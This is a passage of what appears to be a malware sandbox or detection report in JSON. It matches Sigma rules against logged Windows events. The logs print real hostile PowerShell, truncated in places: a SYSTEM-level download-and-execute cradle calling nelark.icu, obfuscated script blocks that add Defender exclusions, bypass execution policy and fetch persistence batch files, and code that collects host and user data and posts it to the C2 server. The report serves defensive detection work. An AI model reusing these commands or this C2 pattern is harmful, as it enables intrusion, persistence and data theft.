"rule_title": "Suspicious SYSTEM User Process Creation",
"rule_description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)",
"rule_author": "Florian Roth (Nextron Systems), David ANDRE (additional keywords)",
"match_context": [
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"EventID": "1",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e88280a32f81c8575c3cb9b02910d867498fbf28ca75ca922ad991faa3a68879",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "PowerShell Download and Execution Cradles",
"rule_description": "Detects PowerShell download and execution cradles.",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"Hashes": "MD5=8A2122E8162DBEF04694B9C3E0B6CDEE,SHA256=B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450,IMPHASH=272245E2988E1E430500B852C4FB5E18",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "Cmd.Exe",
"Product": "Microsoft\\xae Windows\\xae Operating System",
"Description": "Windows Command Processor",
"EventID": "1",
"ParentCommandLine": "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule",
"CommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.746 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\svchost.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\cmd.exe",
"Company": "Microsoft Corporation"
}
},
{
"values": {
"Product": "Microsoft\\xae Windows\\xae Operating System",
"CurrentDirectory": "C:\\Windows\\system32\\",
"OriginalFileName": "PowerShell.EXE",
"Hashes": "MD5=04029E121A0CFA5991749937DD22A1D9,SHA256=9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F,IMPHASH=7C955A0ABC747F57CCC4324480737EF7",
"Description": "Windows PowerShell",
"EventID": "1",
"ParentCommandLine": "cmd.exe /c powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"CommandLine": "powershell -w h -command $obj = New-Object Net.WebClient;$s = $obj.DownloadString(\\\"http://nelark.icu/xftaswx/res/post_proc.php?fpath=a.ps1\\\");iex $s",
"FileVersion": "10.0.19041.546 (WinBuild.160101.0800)",
"ParentImage": "C:\\Windows\\System32\\cmd.exe",
"IntegrityLevel": "System",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"Company": "Microsoft Corporation"
}
}
]
},
{
"rule_level": "high",
"rule_id": "f4143907bd6e32636e7bc2f3b4f1fca7dde5ff6787f10a17b360a798f52c6357",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Uncommon Svchost Command Line Parameter",
"rule_description": "Detects instances of svchost.exe running with an unusual or uncommon command line parameter by excluding known legitimate or common patterns.\nThis could point at a file masquerading as svchost, a process injection, or hollowing of a legitimate svchost instance.\n",
"rule_author": "Liran Ravich",
"match_context": [
{
"values": {
"CommandLine": "%WINDIR%\\system32\\svchost.exe",
"Image": "C:\\Windows\\system32\\svchost.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "124bf07ac70743e91b5698e3731aae0330fc182aa58036390f2a0457a90b5341",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell Download - Powershell Script",
"rule_description": "Detects suspicious PowerShell download command",
"rule_author": "Florian Roth (Nextron Systems)",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"Path": "",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function instant \r\n{\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\",\"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\",\"\")\r\n\t\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro [TRUNCATED]",
"Path": "",
"ScriptBlockId": "b9074726-f447-4eeb-ae01-f320d07e4e96",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "aa066c36-b4fc-42bc-9e1a-a8292d983389",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
"Path": "",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "49b185e25e68c30cebd01a44e72bda0c359c132bb364ef487a935de293813a78",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Execution Policy Tampering",
"rule_description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"EventID": "13",
"EventType": "SetValue",
"Details": "Bypass",
"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\\ExecutionPolicy"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5572c8188426269a10ccb41fc8e9c8445391ac38a0917621b0a1ee05ec99aac9",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Change PowerShell Policies to an Insecure Level - PowerShell",
"rule_description": "Detects changing the PowerShell script execution policy to a potentially insecure level using the \"Set-ExecutionPolicy\" cmdlet.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "189d1f84-c320-4cb7-8fa3-715bbefca8a1",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\t#Set-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tinstant\r\n\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\twhile ($null -eq $sysProc) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t\t$sysProc = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "f12e231f-9aac-412a-be32-b4b73178ce41",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nfunction newDir($path) {\r\n\tif ((Test-Path $path) -eq $false ) {\r\n\t\tNew-Item -ItemType Directory -Path $path\r\n\t}\r\n}\r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.log\"\r\n\t\tif (Test-Path $local) [TRUNCATED]",
"Path": "",
"ScriptBlockId": "b1b561d6-f30f-4c48-b9d7-b59f4e127079",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "function action {\r\n\tSet-ExecutionPolicy -ExecutionPolicy Bypass -Force\r\n\tAdd-MpPreference -ExclusionPath \"$env:windir\\System32\"\r\n\t$exist = Get-Process | Where-Object { $_.Name -eq \"powershell\" -and $_.SessionId -eq 0 }\r\n\tif ($exist.Count -gt 1) {\r\n\t\treturn\r\n\t}\r\n\twhile ($true) {\r\n\t\tgCommand\r\n\t\tStart-Sleep -Seconds 5\r\n\t}\r\n}",
"Path": "",
"ScriptBlockId": "09998871-6404-48e7-98ea-8b74ad96fcf6",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "\r\n$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n\r\nstart \"Screenshot_2.png\"\r\nRemove-Item \"Screenshot_1.png.lnk\" -ErrorAction SilentlyContinue\r\nCopy-Item \"Screenshot_2.png\" \"Screenshot_1.png\" \r\n\r\nfunction gid\r\n{\r\n\t$regPath = \"HKLM:\\Software\\Wireless\"\r\n\t$exist = Get-ItemProperty $regPath -Name uid -ErrorAction SilentlyContinue\r\n\tif ($null -ne $exist) {\r\n\t\t$uid = (Get-ItemProperty $regPath -Name uid).uid\r\n\t}\r\n\telse {\r\n\t\t$local = \"$env:public\\documents\\id.l [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "0aa6d143-3ab3-4a7f-9b19-fa0dc39031ea",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "56b8c79acb8e444c2b00be5c9d3cb8e33e863ccb3506d635f907a49cd053c84f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Startup Folder File Write",
"rule_description": "A General detection for files being created in the Windows startup directory. This could be an indicator of persistence.",
"rule_author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)",
"match_context": [
{
"values": {
"TargetFilename": "%APPDATA%\\microsoft\\windows\\start menu\\programs\\startup\\onedrive.lnk"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5b5656801277c44d48ce3c9f4c8c393d55f8c0943d2c641d4968a012bd160f38",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Powershell Timestomp",
"rule_description": "Adversaries may modify file time attributes to hide new or changes to existing files.\nTimestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5e2ea8c055dd73ea66238735323d0318c2a6c114047137146357b85f764b1101",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious PowerShell WindowStyle Option",
"rule_description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n",
"rule_author": "frack113, Tim Shelton (fp AWS)",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"Path": "",
"ScriptBlockId": "aa066c36-b4fc-42bc-9e1a-a8292d983389",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "d95ea55d-0143-47fa-8e60-f5b255db95b2",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sdu () {\r\n\t$rtet44gg = \"Ht3gjt50Kt3gjt50Lt3gjt50M:t3gjt50\\t3gjt50St3gjt50Ot3gjt50FTt3gjt50WAt3gjt50Rt3gjt50E\\Mt3gjt50ict3gjt50rost3gjt50oft3gjt50t\\Wit3gjt50ndt3gjt50owt3gjt50s\".Replace(\"t3gjt50\", \"\") + \"i3bnoie4\\i3bnoie4Cui3bnoie4ri3bnoie4rei3bnoie4ntVi3bnoie4eri3bnoie4si3bnoie4ioi3bnoie4n\\Pi3bnoie4oli3bnoie4ici3bnoie4iei3bnoie4s\\i3bnoie4Si3bnoie4ysti3bnoie4emi3bnoie4\".Replace(\"i3bnoie4\", \"\")\r\n\t$ruiibttew = \"Cy5tjogroony5tjogrosey5tjogronty5tjogroPy5tjogroroy5tjogrompy5tjogroty5tjogro\". [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "19bddaf3-24cc-4726-82f3-63e6d7e62964",
"Path": "",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "6291f85314c7d9966be831c56d3cdfb30f42c84f599273e73dac5c95e1122abf",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs",
"rule_author": "James Pemberton / @4A616D6573",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n\t$request.GetResponse();\r\n}",
"Path": "",
"ScriptBlockId": "990d9297-f5a7-4487-9387-e827df4df12a",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\",\"\");\r\n$dkdlel = \"a\"\r\n$lognmfl = \"OneDrive.log\"\r\n$fhrmvkdlf = \"\\OneDriveLog\\\"\r\n\r\nfunction gif($fhrmvotm) #get information\r\n{\r\n\t$env:COMPUTERNAME + \"_\" + $env:USERNAME >> $fhrmvotm\r\n\r\n\t# Get-ChildItem ([Environment]::GetFolderPath(\"Recent\")) >> $fhrmvotm\r\n\tipconfig /all >> $fhrmvotm\r\n\tnet user >> $fhrmvotm\r\n\tquery user >> $fhrmvotm\r\n\t\r\n\t\"\" >> $fhrmvotm\r\n\t\"Currently logged in users:\", \"-------------------------- [TRUNCATED]",
"Path": "",
"ScriptBlockId": "a4d52191-f873-49f1-9b13-9fdeb4adbdac",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function sif() {\r\n\t$fph = $env:windir + \"\\Temp\" +$fhrmvkdlf\r\n\tNew-Item -Path $fph -Type directory -Force\r\n\t$hFLgPth = $fph + $lognmfl\r\n\tgif $hFLgPth\r\n\t$hexdata =[IO.File]::readalltext($hFLgPth)\r\n\t$bytes = [System.Text.Encoding]::UTF8.GetBytes($hexdata)\r\n\t$b64 = [System.Convert]::ToBase64String($bytes)\r\n\t$udivkv = $mainUri + \"res/index.php\"\r\n\t$uid = gid\r\n\t# Invoke-WebRequest -Uri $udivkv -Method Post -Body \"uid=$uid&result=$b64\"\r\n\tpostRequest $udivkv \"uid=$uid&result=$b64\"\r\n\tRemove-Item -path $hF [TRUNCATED]",
"Path": "",
"ScriptBlockId": "4e7b0706-2a37-4037-af3a-b75aa5b5fb33",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
},
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"Path": "",
"ScriptBlockId": "5aeddb41-a6bc-40c3-94ba-2530bf8dd844",
"MessageTotal": "1",
"EventID": "4104",
"MessageNumber": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "cf863dff3d564c975d28d336cb7981fcd6956e6fb9afbd2794f600b130e83171",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Windows Defender Exclusions Added - PowerShell",
"rule_description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions",
"rule_author": "Tim Rauch, Elastic (idea)",
"match_context": [
{
"values": {
"ScriptBlockText": "$mainUri = \"hujkdtujkdtujkdps:ujkd/ujkd/nelark.icu/xftaswx/ujkdujkd\".Replace(\"ujkd\", \"\");\r\n\r\nfunction postRequest($url, $text) {\r\n\t$request = [System.Net.WebRequest]::Create($url);\r\n\t$request.Method = \"POST\";\r\n\t$request.ContentType = \"application/x-www-form-urlencoded\";\r\n\t$bytes = [System.Text.Encoding]::ASCII.GetBytes($text);\r\n\t$request.ContentLength = $bytes.Length;\r\n\r\n\t$requestStream = $request.GetRequestStream();\r\n\t$requestStream.Write( $bytes, 0, $bytes.Length );\r\n\t$requestStream.Close();\r\n [TRUNCATED]",
"MessageTotal": "1",
"ScriptBlockId": "c34ad247-3994-44bc-a85b-233728e2943b",
"Path": "",
"MessageNumber": "1",
"EventID": "4104"
}
},
{
"values": {
"ScriptBlockText": "function persist {\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:TEMP\"\r\n\tStart-Process PowerShell -Verb RunAs -WindowStyle Hidden \"Add-MpPreference -ExclusionPath $env:windir\\System32\"\r\n\t\r\n\t$url2 = $mainUri + \"res/post_proc.php?fpath=scheduler-once\"\r\n\t$dst2 = $env:TEMP + \"\\scheduler-once.bat\"\r\n\t$WebClient = New-Object System.Net.WebClient\t\r\n\t$WebClient.DownloadFile($url2, $dst2)\r\n\t\r\n\t$dst3 = $env:windir + \"\\System32\\sysmon2.bat\"\r\n\t$dst4 = $env:w [TRUNCATED]",
